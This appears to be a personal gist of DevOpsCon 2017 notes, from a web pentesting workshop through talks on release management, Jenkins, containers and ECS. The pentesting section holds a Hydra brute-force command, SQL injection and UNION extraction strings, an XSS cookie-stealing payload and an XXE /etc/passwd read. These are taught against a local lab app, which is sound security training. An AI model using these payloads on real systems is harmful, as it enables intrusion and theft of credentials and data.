
@jahe
Last active January 8, 2019 21:01
DevOpsCon 2017 Notes

Glossary

A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. a different design). The version with the better conversion rate wins.
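The comparison can be sketched in a few lines of Python (numbers are illustrative, not from the talk):

```python
# Minimal A/B evaluation: each variant is (conversions, visitors);
# the variant with the higher conversion rate wins.

def conversion_rate(conversions, visitors):
    """Fraction of visitors that converted."""
    return conversions / visitors if visitors else 0.0

def ab_winner(a, b):
    """a and b are (conversions, visitors) tuples; returns 'A', 'B' or 'tie'."""
    rate_a, rate_b = conversion_rate(*a), conversion_rate(*b)
    if rate_a > rate_b:
        return "A"
    if rate_b > rate_a:
        return "B"
    return "tie"

print(ab_winner((120, 1000), (150, 1000)))  # -> B
```

In practice you would also check that the difference is statistically significant before declaring a winner.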


Monday

09:30 - 17:00 (Salon 4) - Web Hacking: Pentesting and attacking Web Apps

http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf

FindBugs + FindSecurityBugs - Plugins in Eclipse

CVE

CVE-ID - One vulnerability in a CVE registry. It includes a score.

CVEDetails.com - Publicly known vulnerabilities, e.g. Tomcat 7.0.61: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/version_id-190760/Apache-Tomcat-7.0.61.html

  • Search by version numbers
Exploit Database

exploit-db.com - Exploits with code ready to use (e.g. a Python code snippet to trigger a vulnerability)

exploits.shodan.io

Nikto

Scans the web server and checks for vulnerable files

> nikto -h http://localhost:8080

Executes thousands of HTTP requests to check whether anything is vulnerable (not exploiting -> rather fingerprinting)

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          127.0.0.1
+ Target Hostname:    localhost
+ Target Port:        8080
+ Start Time:         2017-06-12 04:19:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /examples/servlets/index.html, fields: 0xW/7139 0x1427457886000 
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7677 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-06-12 04:19:52 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Intercepting Proxy
  • THE pentester's/hacker's IDE
  • Local proxy server -> Configure any kind of web client (e.g. a browser) -> All the traffic emitted by this client goes through the proxy
  • Proxies HTTP and HTTPS traffic
  • Sniffs the network
  • Intercepts Web traffic
  • Puts us in command to better attack the server
  • We can also route our smartphone through this proxy (inspect mobile apps talking to a backend REST API)
OWASP ZAP
  • Intercepting Proxy
  • There is a Plugin for ZAP to import a Swagger definition file: zaproxy/zaproxy#2034
  1. Change the Port to another port (Tools > Options > Local Proxy): 4711
  2. Set Proxy in Firefox (empty the "No Proxy for" stuff)
  3. Request to our webserver
  4. See the requests in ZAP
  5. Toggle to intercepting Mode (Breakpoint mode)
  6. Request to our webserver
  7. Go to the Break tab
  8. Change the payload of the request in this tab
  9. Hit "Go to next Breakpoint" (Play button)
  10. Hit "Show hidden fields" (lightbulb) - Shows all hidden fields in the web browser

Passive Scan Mode (the default, as it is non-invasive)

  • Tab "Alerts"
  • Shows possible vulnerabilities
Active Scan Mode - "Scan as you surf"-Mode
  • Attacking while traversing through the application
  • It automatically injects SQL + XSS payloads and permutes every input vector in each request
  • There is a Jenkins Plugin which executes a ZAP Active Scan in a headless mode
  • You can export an HTML report of the active scan
  1. Right Click in ZAP on the Site: Add to Context > Add to default context
  2. Now the site has a target symbol
  3. Click ATTACK Mode (HINT: Now you are in "Scan as you surf"-Mode)
  4. Now it is attacking (in the Active Scan Tab)
  5. Now click on a Link on the webpage
  6. Now it scans this new site
  7. When you go to the previous site it doesn't get scanned again

Active Mode Settings

  • Scan Policy - How deep should the scan reach (Analyze > Scan Policy Managers)
  • Active Scan Input Vectors - (Tools > Options)

Plugins

  • Advanced SQLInjection Scanner (derived from SQLMap) --> Every active scan includes this SQLMap functionality
Arachni
  • http://www.arachni-scanner.com/
  • CLI
  • Not part of Kali Linux by default
  • Point to your test system and let it run
  • Ruby based
  • can serve a UI
  • Provides a headless PhantomJS based browser cluster (takes a lot of resources)
    • A scan takes long (so execute it only in a nightly build)
  • It is better at spidering JavaScript-based apps than ZAP's spider
  • You can provide a login script
  • Nice HTML Report
Crack admin PW via bruteforce with the tool "Hydra"
  • CLI-Tool
  • Services inside Hydra: Bruteforcing those services
  • Bruteforce with a password list as a seed
    • There are password lists inside of Kali Linux: /usr/share/wordlists/rockyou.txt.gz
    • Or on GitHub: danielmiessler/SecLists
  1. Login request on our site (proxied through our ZAP)
  2. Take a look at the request in ZAP
  3. Use the form input fields on the request header as our seed
  4. Use top-pw-cracking-list.txt
  5. > hydra

hydra -t 4 (number of threads) -f (stop on the first finding) -l admin (user to bruteforce) -P top-pw-cracking-list.txt (password list) localhost (host) -s 8080 (port) http-post-form (service) "/marathon/secured/j_security_check:j_username=^USER^&j_password=^PASS^:Wrong"

"Wrong" is the failure string expected in the response body of an unsuccessful login.

> hydra -t 2 -f -l admin -P top-pw-cracking-list.txt localhost -s 8080 http-post-form "/marathon/secured/j_security_check:
j_username=^USER^&j_password=^PASS^:
Wrong"

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-12 05:31:37
[DATA] max 2 tasks per 1 server, overall 64 tasks, 1001 login tries (l:1/p:1001), ~7 tries per task
[DATA] attacking service http-post-form on port 8080
[8080][http-post-form] host: localhost   login: admin   password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-12 05:31:38
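Hydra's decision rule boils down to: a response that does not contain the configured failure string ("Wrong") is a hit. A sketch of that loop in Python, with a purely hypothetical fake_login() standing in for the real HTTP POST:

```python
# Sketch of the logic hydra's http-post-form module applies: try each password
# from a wordlist and treat a response that does NOT contain the configured
# failure string as a hit. fake_login() is a hypothetical stand-in for
# POSTing to the login form.

FAILURE_MARKER = "Wrong"

def fake_login(username, password):
    """Hypothetical stand-in for the real login request."""
    if username == "admin" and password == "password":
        return "Welcome admin"
    return "Wrong username or password"

def brute_force(username, wordlist):
    for candidate in wordlist:
        body = fake_login(username, candidate)
        if FAILURE_MARKER not in body:
            return candidate  # stop on the first finding, like hydra -f
    return None

print(brute_force("admin", ["123456", "letmein", "password"]))  # -> password
```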
SQL-Injection
  • Java: Easy to fix with prepared statements
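The talk names Java's prepared statements; the same fix shown with Python's sqlite3 (schema is illustrative) binds the value as a parameter instead of concatenating it into the SQL string:

```python
# "Don't mix data with code": the parameter is bound by the driver, so a
# value like "2 OR 1=1" stays data and never becomes SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE results (marathon_id INTEGER, runner TEXT)")
conn.execute("INSERT INTO results VALUES (1, 'alice'), (2, 'bob')")

def show_results(marathon_id):
    # Placeholder (?) instead of string concatenation = prepared statement
    rows = conn.execute(
        "SELECT runner FROM results WHERE marathon_id = ?", (marathon_id,)
    ).fetchall()
    return [r[0] for r in rows]

print(show_results(2))           # ['bob']
print(show_results("2 OR 1=1"))  # [] - the injection attempt is just a string
```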

Possible Injection Strings

  • '
  • or 1=1 --
  • and 'a'='a
  • etc. quoted and unquoted

Boolean blind test (against an unquoted SQL injection -> no ' is needed)

  1. Request to http://localhost:8080/marathon/showResults.page?marathon=2
  2. Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=1
  3. Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=2
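The probe can be reproduced locally against a deliberately vulnerable, string-concatenated query (SQLite here, schema is illustrative):

```python
# A vulnerable query behaves identically for "2" and "2 AND 1=1" but returns
# nothing for "2 AND 1=2" - that difference is the boolean oracle revealing
# the unquoted injection point.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE results (marathon_id INTEGER, runner TEXT)")
conn.execute("INSERT INTO results VALUES (2, 'alice')")

def vulnerable_query(marathon_param):
    # String concatenation: the classic mistake
    sql = "SELECT runner FROM results WHERE marathon_id = " + marathon_param
    return conn.execute(sql).fetchall()

print(vulnerable_query("2"))          # [('alice',)]
print(vulnerable_query("2 AND 1=1"))  # [('alice',)] - same as baseline
print(vulnerable_query("2 AND 1=2"))  # []           - the oracle fires
```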

Within the Code with the String concatenated SQL query

  • marathonId is "tainted" as it comes from the outside
  • finishedFilter isn't "tainted"

Find out table and column names

  • By selecting meta tables/views (i.e. PG_TABLES in PostgreSQL)
  • By using UNION
    • SELECT ... FROM ... WHERE UNION SELECT ... FROM ... WHERE ...
    • Prerequisites for our UNION
      • Same number of columns that the original SELECT has
      • Same datatypes that the original SELECT has
    • Use null because null is datatype independent: SELECT null, null...
    • The Resulting Injection String: UNION SELECT null, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
    • Use the "--" at the end to comment the rest of the query out
    • Shift a String 'X' around in the SELECT until we find a column for which a String is an acceptable datatype: UNION SELECT 'X', null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
      • When we found a matching column: Get the column datatype and the column name by inserting the following instead of the 'X':
        • ???
      • We can then select the credit card numbers from the discovered table:
        • UNION SELECT credit_card_number, null, null FROM <discovered table>--
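A local sketch of the UNION technique (SQLite; table and column names are illustrative, and SQLite's schema table stands in for information_schema):

```python
# Step 1: a UNION SELECT with the right number of NULL columns succeeds
# (NULL is datatype-independent). Step 2: read another table's data through
# the same injection point.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE results (marathon_id INTEGER, runner TEXT, finished INTEGER);
INSERT INTO results VALUES (2, 'alice', 1);
CREATE TABLE customers (credit_card_number TEXT);
INSERT INTO customers VALUES ('4111-1111-1111-1111');
""")

def injectable(marathon_param):
    sql = ("SELECT marathon_id, runner, finished FROM results "
           "WHERE marathon_id = " + marathon_param)
    return conn.execute(sql).fetchall()

# Three NULLs match the original SELECT's column count, so no error is raised
probe = injectable("2 UNION SELECT null, null, null--")
# Exfiltrate data from another table through the injection point
loot = injectable("2 UNION SELECT credit_card_number, null, null "
                  "FROM customers--")
print(loot)
```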
Blind SQL-Injection exploitation
  • Determine table names or other columns values by using db timings with ASCII() and Sleep() functions and CASE WHEN within the WHERE statement.
    • If the first char has an ASCII value lower than 100, then sleep 3 seconds. When the request now takes 3 seconds, you know that the first char's ASCII value is below 100. By narrowing the range we can determine the exact char.
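SQLite has no SLEEP(), so the sketch below replaces the timing side channel with a direct boolean oracle; the binary-search idea is the same (unicode() stands in for ASCII(), and the table is illustrative):

```python
# The oracle answers "is the code point of character i below n?". In a real
# attack the CASE WHEN would trigger a SLEEP() and you would measure response
# time instead of reading the result directly.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (password TEXT)")
conn.execute("INSERT INTO users VALUES ('secret')")

def oracle(position, threshold):
    """True if the char at `position` (1-indexed) is below `threshold`."""
    sql = ("SELECT CASE WHEN unicode(substr(password, %d, 1)) < %d "
           "THEN 1 ELSE 0 END FROM users" % (position, threshold))
    return conn.execute(sql).fetchone()[0] == 1

def extract_char(position):
    lo, hi = 0, 128
    while hi - lo > 1:          # binary search over the ASCII range
        mid = (lo + hi) // 2
        if oracle(position, mid):
            hi = mid
        else:
            lo = mid
    return chr(lo)

print("".join(extract_char(i) for i in range(1, 7)))  # recovers "secret"
```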

sqlmap

Source and Sink

source - Source of malicious data. Everything coming from a request (input vector / what an attacker can modify)
sink - The operation the data ends up in; through the source, the attacker has 100% control over its arguments

Source finds a way into a sink --> Vulnerability

Taint Tracking - Trace the request from source to sink
Taint Flow - ???

Cross-Site Scripting (XSS)
  • Top 3 in OWASP Top 10
  • With XSS we can do everything a user can do

Three Types of XSS

  1. Reflected XSS - Directly reflected in the browser after inserting a vulnerable String (just one user interaction)
  2. Persistent XSS - The malicious code sits inside the DB and pops up on every refresh
  3. DOM-based XSS - JavaScript based

<img src="//localhost/myimg.png" onload='this.src="//localhost/log.jsp?value=" + document.cookie'>

HttpOnly - Can be set on cookies so that they can't be read by (malicious) JavaScript
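Setting the flag with Python's stdlib, for illustration (cookie name and value are made up):

```python
# A cookie flagged HttpOnly is withheld from document.cookie, so the XSS
# payload above could not exfiltrate it.
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["JSESSIONID"] = "abc123"
cookie["JSESSIONID"]["httponly"] = True
cookie["JSESSIONID"]["secure"] = True   # while at it: HTTPS-only

header = cookie["JSESSIONID"].OutputString()
print(header)  # e.g. JSESSIONID=abc123; HttpOnly; Secure
```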

Escape out of an attribute (i.e. title)

  • <button title="Inserted the value of 2">Back</button>
    • <script>alert(1)</script> would result in: <button title="Inserted the value of <script>alert(1)</script>">Back</button>
    • But with "><script>alert(1)</script> it results in: <button title="Inserted the value of "><script>alert(1)</script>">Back</button>
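Escaping the quote character is what prevents the breakout; shown with Python's html.escape for illustration:

```python
# html.escape(..., quote=True) encodes the " that would close the attribute,
# so the payload stays inside the title attribute as inert text.
from html import escape

payload = '"><script>alert(1)</script>'
safe = escape(payload, quote=True)
button = '<button title="Inserted the value of %s">Back</button>' % safe
print(button)
```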
Beef
  • Ruby based tool
  • Browser Exploitation Framework
  • Abuses XSS vulnerabilities
  • Provides a UI (with Ext JS)
  • The victim's browser sets up a WebSocket connection to the Beef server
  • The attacker sees the online clients in the UI
  • The attacker can execute stuff on the client + read values out of forms etc.
Open Bug Bounty
  • openbugbounty.org
  • Publicly known XSS vulnerabilities of websites
XML eXternal Entities

Uploading an XML file

  • Include an inline DTD in the XML --> The XML parser reads the /etc/passwd file and writes it into the XML:
<?xml ...?>

<!DOCTYPE test [
    <!ENTITY cool SYSTEM "file:///etc/passwd">
]>

<myType>
    &cool;
</myType>
OWASP
  • Best practices on how to pentest
  • Top 10 vulnerabilities
  • Non-profit organization
  • They provide the "Intercepting Proxy" OWASP ZAP (already part of Kali Linux)
WHAT WE HAVE TO DO ON OUR APPLICATIONS
  • HTTPS everywhere
  • Don't mix data with code (i.e. concatenating variables into a SQL query String)
  • Don't store files uploaded by users in the filesystem --> Use the DB with Lobs instead

Tuesday

09:00 - 09:30 (SAAL MARITIM B/C) - Reception and Opening

09:30 - 10:00 (SAAL MARITIM B/C) - Crossing the River by feeling the Stones

10:15 - 11:15 (SAAL MARITIM B/C) - Challenges in Release Management for complex and highly regulated Environments

What drives DevOps?

  • We have to be faster than before
  • Cloud
  • Multi-Channel (i.e. Voice-Channel: Alexa)
  • Time-to-Market (automated release approach)

Complex dev environment

  • A lot of agile teams
  • Separate release streams
  • Different technology stacks with different tools
  • Dependencies between applications

Regulations

  • PCI - WHAT!?
  • SAE - WHATTTT
  • FDA - Hmm?
  • Automotive Spice - WTF?

Core Principles

  • Traceability
  • Responsibility
  • Audit-safe - Not changeable

What do we have to do?

  • Efficient delivery framework
  • Make the toolchain changeable (i.e. does your Toolchain support serverless in the future)
  • Higher agility (i.e. Product Managers have to work more agile)
  • Communicate successes/achievements inside of the company (i.e. Testers didn't know that there is an automated provisioning system for test platforms)

Requirements on our toolchain

  • The pipeline process has to be visible
  • Dependency Management
  • Quality Gates
  • Cross Pipeline reporting
  • ...

Problem: 300 - 400 tasks over all stages from dev to prod

Only 5% of 1,000,000 deployments reach production

  • Why? Because they missed quality Gates in the pipeline

How to do it with so many tools?

  • Dev > Build > Integrate > Test > Release > Deploy > Operate
  • What is the market leader to do all these things
    • Most companies do it with an Excel list (document the Release Process with start/end dates, durations, team members for each individual application)
      • They require weekly + daily release meetings
      • The Release Manager asks you: Is this or that done yet? - No because we have to wait for another person outside of the team to do stuff
  • Integrate everything in the release process
  • Change Management DB - What has been released etc.

The Big Picture

  • Release Pipeline Diagram
  • Two different Artifactories for internal and production use
  • ...

AWS + CloudFoundry + OpenStack

  • Pipeline
    • -> Internal Cloud (CF + OpenStack)
    • -> AWS
    • -> ...

Pipeline for a Pipeline

  • Development Pipeline --- All pipeline changes are tested first ---> Production Pipeline

Self service onboarding (What?! :D)

  • Diagram
  • Developers
    • -> XL-Release (AppName, GitHub Repo, etc. provided by the developers)
      • -> Pipeline

X-File - A Groovy DSL to define your release pipeline for XL-Release

  • Defines Phases
    • Has a Task (i.e. to wait for something (QA))
    • Has Dependencies

XL-Release provides a Web UI

  • A Board for a Release (Flow - For Business People)
  • A calendar with planned releases and their dependencies (e.g. somebody has to install a test system on a machine)
  • This UI tries to replace an Excel Sheet
  • It also tries to replace E-Mail
  • Compliance
    • Rights Management (Who can start/abort a release etc.)
    • Auditing
    • Reporting - Who did what?
    • Traceability - Where are we in the release process?

How to deploy

  1. Deploy to a cluster
  2. Make a smoke test

CD books tell you: When there is an error -> Don't fix the symptoms -> "Press the red button" -> Fix the source of the error -> Retrigger a new deployment

12:00 - 13:00 (SALON 7) - Don’t crash the Sandmann – continuously build, test and deploy on OTC

Customer: RBB

  • rbb-online.de
  • rbb24.de
  • Problem: Millions of requests on the news page (during the terror attack)
    • --> Buy new HW or go in the cloud
  • There are high peaks on the "Sandmann" webpage whenever the Sandmann show runs on TV
  • They moved to the OTC (Open Telekom Cloud)

Load Testing with Monitoring

  • CLI Monitoring Tool: Taurus
  • Visible as a graph in the CLI
    • 20 concurrent users
    • 20 active users
  • nload - CLI Tool that monitors the current network traffic (In and Outgoing) on the console
  • Jenkins Slave on the OTC triggers the Load Test
    • Produces an XML Report with a Graph of all the instances running over time

Taurus

  • CLI tool
  • Can trigger JMeter
  • Configure in YAML file --> ??? Does it produce a JMeter config ???
    • Define concurrent clients firing requests
    • Define scenarios
      • Requests to http://...
    • Define Reporting
      • Define Criteria when to fail the test (i.e. max response time)
  • Tests an Auto Scaling Group in the OTC

JMeter

  • Don't use GUI mode for load testing
  • There is a headless mode to run the load test
  • Configuration + Scripting is bad in the GUI, better do it with Taurus' YAML file

OTC - Based on OpenStack

  • Auto Scaling
    • Multiple Groups
      • With multiple Instances
  • Hosted in Magdeburg and Biere

RBB

  • Images are built on the OTC with Ansible via Jenkins and are published in a private registry
  • Automated Load- and Performance Testing
  • Webcaching Layer on OTC
    • HAProxy

OpenStack

  • Growing ecosystem

Pets vs. Cattle - ???

Jump Host - ???

VPC - ???

ECS - Elastic Cloud Server

  • Name
  • Type
  • Number of vCPUs
  • Memory
  • Image Type
  • Image
  • Network
    • Which VPC
    • IPs

Public Images (Latest OS Base Image) -> git repo (managed by DevOps Team) -> Development VPC (Temp. Server v1) -> Private Images (Custom Server Image v1) -> Production VPC (Ephemeral Server v1)

Automated Testing

  1. Change to the Code (Git checkin)
  2. Pipeline is triggered
  3. Image is created
  4. Functional Image is created
  5. Image is deployed on the OTC

Overview

  • Jenkins Master in Customer Site
  • Git Repo in Customer Site
  • Jenkins Slave in VPC
  • A VPC for Testing
  • A VPC for Production

Rolling Update (Updates without any Downtime)

  1. Change the config in one Auto Scaling Group
  2. A new instance with the new config is starting up
  3. Now two instances are running in the same Auto Scaling Group
  4. The new instance shows the new content
  5. Trigger the down-scaling in the UI
  6. Now only the new version is live

14:15 - 14:45 (SAAL MARITIM B/C) - Enabling Agility at Scale for the heavily regulated

ING (Bank)

The last agile mile

2012

  • Commerce
  • Application dev
  • Application ops
  • Infra dev
  • Infra ops

2013

  • Commerce
  • Agile / Scrum
  • Application ops
  • Infra dev
  • Infra ops

2014

  • Commerce
  • DevOps (CD) 118 Teams
  • Infra dev
  • Infra ops

2015

  • BizDevOps (Tribes & Squads) 400 Teams
  • Infra dev
  • Infra ops

2016

  • BizDevOps (Manual IT Risk + Private Cloud)
  • Infra ops

IT-Risk

  • Policy
  • Principle
  • Control Framework
  • Pipeline

Principles

  • Speed - No longer fill out forms
  • Outcomes over Impositions
    • Outcome - Not a filled in form, but meetings
  • Shift-Left - Nobody patches apps in production without going through QA
  • Human vs. Robots
  • Immutable Servers
  • Cattle and Pets
    • Pet - Server in Prod -> Go to the doctor when its sick
    • Cattle - Get another one when it is sick
  • Infrastructure = Code
    • Robots = software
    • Humans leverage automated pipelines

Learning organization

  • Weird assumptions about the roles of a software engineer
    • Designer
    • Coder
    • Tester
    • Deployer
    • Requirements Specifier
    • Solution Architect
    • ...
  • ING changed HR

Complex Apps are best managed with Feedback loops

Feedback Loops

  • Need to be designed

BizDevSecRiskOps

  • Shift Left

Twitter: @henkkolk

15:00 - 16:00 (SAAL MARITIM B/C) - Continuous Delivery with Jenkins in the real World

They moved from Jenkins 1 to Jenkins 2 with CD

Continuous Delivery vs Continuous Deployment

  • Continuous Delivery - Before production (you can merge into the master branch and build your artifact, but it does not go into production)
  • Continuous Deployment - Goes into production

Diagram

  • Handler (entry point: it is time to do something) (e.g. a git merge)
  • VM or Container that is clean and is similar to your production system: A place to run your tests
  • Tests failed - do something (i.e. open an issue)
  • Tests ok - do something

Continuous Delivery

  • Increase the number of releases
  • Build > deploy code in a safe env > run test > deploy

Continuous Integration

  • Integrate new code into the old code: is the new code compatible with the old code?
  • Run security tests in this phase
  • GitHub lets Jenkins check whether the new code is compliant (the merge button is disabled when it is not)

Why use Continuous Delivery?

  • Stay focused on Business
  • Reduce human errors - a cycle that repeats over time (we as humans are not good at those tasks -> boring)
  • Configure Jenkins to send notifications to your communication channel of choice (i.e. Slack, Telegram or e-mail)
  • Keep developers focused

Terminology

  • Release
  • Artifact/Artefact
  • Pipeline - Tunnel that our code follows from the VCS to the environment (define it via a Jenkinsfile)
  • Continuous Delivery
  • Continuous Integration
  • Continuous Deployment
  • Rollback - A deploy can fail / can break the system. Hard topic. When something breaks: start again from an old version in git (complex systems: snapshots)
  • CI server - Jenkins
  • Job - Single pipeline that starts when code is merged

Unique Pipeline

  • Has to be unique

Speedy

  • Make your pipeline fast (i.e. split your pipeline / parallelize your pipeline)
    • Smoke tests on merge to master, parallel to static analysis of the code

Reproducible

  • You can reproduce the env on your local environment

Versionable

  • Changes are lost in Jenkins when someone comes along and changes the settings of a Jenkins job --> Bad.
  • Jenkins Pipeline Plugin - Pipeline "Hascode"???: Put a file in your VCS that updates the settings via a git merge. It grows with your application (it is comfortable to roll back)

Track! Track! Track!

  • Monitor the productivity and mark your important steps
  • Mark a deploy to understand the changes
    • Red vertical lines in a graph which (Grafana) marks a new deploy to see how a new version behaves (compare it in an easy way)
  • Organize a party :D

Communication Layer

  • Goal: Keep Guys out of Jenkins

Create Strong integration

  • Work hard to keep your pipeline efficient

Staging Environment - Improvements

  • 4 Environments
  • A new PR is opened
    • Job: PR Checker (3 minutes)
    • Periodic job that runs the unit tests with code coverage (split it from the PR Checker to keep the pipeline fast) (18 minutes)
  • Merged to develop
    • Job: Artifact Creator Job - Creates the artifact
      • triggers: Job: Staging - Copies artifact + starts secondary Tomcat
  • Testing begins
  • Post Staging Acceptance
    • Job: Deploy Pre Production (1 minute)
  • Testing Complete
    • Job: Release to Production (25 sec)
  • Sanity Checks Complete
    • Job: Merge (2 minutes)
    • Job: Release

His Workflow

  1. Merge feature branch to develop
  2. run unit test + run static analysis + docker build + deploy to acceptance
  3. merge develop to master (if 2. is working)
  4. run unit test + run static analysis + docker build + deploy to production

His optimizations to his workflow

  • Merge to master and use the same docker image in dev and prod
  • Snapshot rollback

Jenkins server is the unique door to release to production

  • monitor - Monitor your servers
  • logs - tail logs
  • recovery - jenkins can fail --> Have a recovery system
  • HA -
  • scalability - Jenkins support multi node environment with Jenkins workers (scale your jenkins by adding new nodes)
  • ❤️ your CD process

Backup / Restore policy

  • What happens during disaster?
  • Are we able to recover?
  • He backs up JENKINS_HOME, excluding plugins
  • There are plugins for that but he uses scripts to do it

Pipeline as code

  • Groovy DSL
  • Script it rather than configure it in the jenkins UI
node {
    stage("Checkout") {
        git branch: "master",
            credentialsId: "github-asdf",
            ....
    }
}

Trigger a build with Hubot

  • Built by GitHub
  • Chat with the robot. It takes the message and deploys it
  • JavaScript + NodeJS
  • Slack has a public protocol

Blueocean

  • New UI for Jenkins
  • It is a plugin for Jenkins
  • New fancy way to manage pipelines

(Jenkins) Plugins as code

  • It is not easy to do
  • Specify a list of plugins that you need
  • Bash Script: install-plugins.sh (look it up on GitHub)
    • Reads the file with all the plugins that you specified and installs them in Jenkins
    • Problem: Plugin Versions

@gianarb http://gianarb.it

16:45 - 17:45 (SAAL MARITIM B/C) - Continuous Delivery with Containers: The Good, the Bad, and the Ugly

OReilly Book: "Containerizing Continous Delivery in Java"

Containers + CD

  • Push something (the container image) down the pipeline that has to stay the same (no variations)
  • Adding meta data to container images is vital

Continuous Delivery

  • Book "Continuous Delivery"
  • Not "necessarily" Continuous Deployment
  • A Build Pipeline is mandatory
  • DEV > QA > STAGING > PROD

Containers + CD

  • Container image == 'single binary' - the single thing that gets down the pipeline (like a .war)
  • Impacts QA (no longer pulling down a .war or .jar) and Production

Pipeline for Containers

  • Local should be as production-like as possible
  • Locally use the same image as in production (Alpine vs. CentOS etc. --> Decide!)

Telepresence

  • Tool when working with Kubernetes
  • Work locally while running on a cluster

Hoverfly

  • Tool to mock out APIs
  • Doing this by recording or simulating traffic
  • Synthetic APIs to work locally

Dockerfile (super important) - ??? One Dockerfile for local development and production ???

  • OS choice
  • Configuration
  • Build artifacts
  • Exposing ports
  • Language specific stuff
    • JDK vs JRE + Oracle vs OpenJDK

Different Test and Prod Containers?

  • DB in the Test Container
  • Better use a "test sidecar container" with all the other tools that you need (Selenium etc.) - Look up the blog post on this slide!
  • Docker multi-stage builds - Interesting idea

Building images with Jenkins

  • CloudBees has nice open-source plugins for Jenkins to build images

Storing in an image registry

  • DockerHub

Metadata - Adding data as it goes down the pipeline

  • Who built it etc.
  • Version your Images
  • "Latest" Tag in Docker
    • HINT! It means the last image built without a specific tag/version!
    • DON'T USE LATEST: Always tag with an explicit version
  • Application Metadata
    • Version (semver)
    • GIT SHA
  • Build metadata
    • build data + image name + vendor
  • ...
    • QA control
    • Security audited
  • Adding labels at build time
    • Docker labels
  • Labelling (look it up on GitHub)
    • Create file '/hooks/labels'
  • You can add data on build time
  • label-schema.org
  • microbadger.com
  • Adding Labels at runtime can be done...
    • docker run -d --label (that will commit the label in the docker image --> but it does create a new image)
    • Best solution: A registry with metadata support: JFrog Artifactory or NexusOSS (Modify the metadata in the registry rather than in the image itself)

Component Testing

Testing: Jenkins Pipelines (as code with a Jenkinsfile --> Creates the Job out of this file)

  • Baked into jenkins
  • node { stage("asdf") ... }
  • Stages are shown in Jenkins

Testing individual containers

node {
    stage("asdf") {
        docker.image()....
        waitFor... // wait 30 until /health endpoint returns "UP"
    }
}

Docker Compose + Jenkins Pipeline

node {
    stage('end-to-end tests') {
        ...
        sh "docker-compose ..."
    }
}

Testing NFRs has to be in the build pipeline!!!

  • Performance + Load testing
    • Gatling (Scala-based DSL: better than JMeter) / JMeter
    • Flood.io - Commercial product that takes your Gatling script and spins up Amazon machines
  • Security testing
    • Findsecbugs / OWASP Dependency Check
    • Bdd-security (Wrapper around OWASP ZAP) / Arachni (More JavaScript Pen-Testing tool -> Covers the basics)
    • GauntIt / Serverspec
    • Docker Bench for Security / CoreOS Clair

Delaying NFRs to the "Last Responsible Moment"

  • "We are agile" so we can implement security checks and stuff later... --> WRONG!

Mechanical sympathy: Docker and Java

  • JVM takes half of the RAM of the machine (doesn't work in a Docker container)
  • Memory Problems
    • Container 2GB Memory == Heap 2GB Memory...No, Don't give all the RAM to one container!!!
  • Entropy problems (when no peripheral device is plugged in --> Java cannot generate random data for security purposes)
  • TEST those Things in your Pipeline!!!

Observability is core to continuous delivery

  • READ! InfoQ: The Challenge of Monitoring Containers at Scale

Containers are not a silver bullet

Container Platform

  • OpenShift is nice for that
  • Book: Infrastructure as Code

Summary

  • Continuous Delivery is vital
  • Container images must be the single source of truth within the pipeline
    • Metadata added in the pipeline
  • Mechanical sympathy is important
  • ...

Books

  • Continuous Delivery
  • Building Microservices
  • Microservices
  • More Agile Testing
  • ... look them up on the slides

DevOps Weekly Newsletter

@danielbryantuk

18:15 - 19:15 (SAAL MARITIM A) - Deliver Docker Containers continuously with ECS

ECS Cluster

  • Includes Container Instances with an ECS-Agent (Docker container as well)
  • ECS-Agents communicate with AWS to start new instances if needed

ECS Cluster - Deployment Options

  • AWS Console
    • Easy to start
    • UI on the Website
  • AWS CLI
    • Not easy to start
    • Automation is possible
    • A script can get complicated and very verbose (not what we want)
  • ECS CLI
    • It is easy to start
    • Automation is possible
    • Via one command a cluster is up
    • But don't use it in production
  • Cloud Formation
    • YAML File -> Send this to the CF Service -> Does the things that need to be done
    • Changes to this File result in the required changes
    Parameters:
      KeyName:
        ...
    Resources:
      ECSCluster:
        ...
      ECSAutoScalingGroup:
        ...
      ...
    ...
    

ECR - The Docker registry in the AWS

The first deployment

  • Describe the container on first deployment
    • Image
    • Port mapping
    • Mount points
    • Network options
    • Docker options
  • Task Definition - Contains Containers
    • IAM Task Role ???
    • Volumes
    • Network Mode
    • Task Placement Constraints
  • Service Description - Contains a Task
    • Loadbalancer
    • AutoScaling - Based on metrics: Please scale up etc.
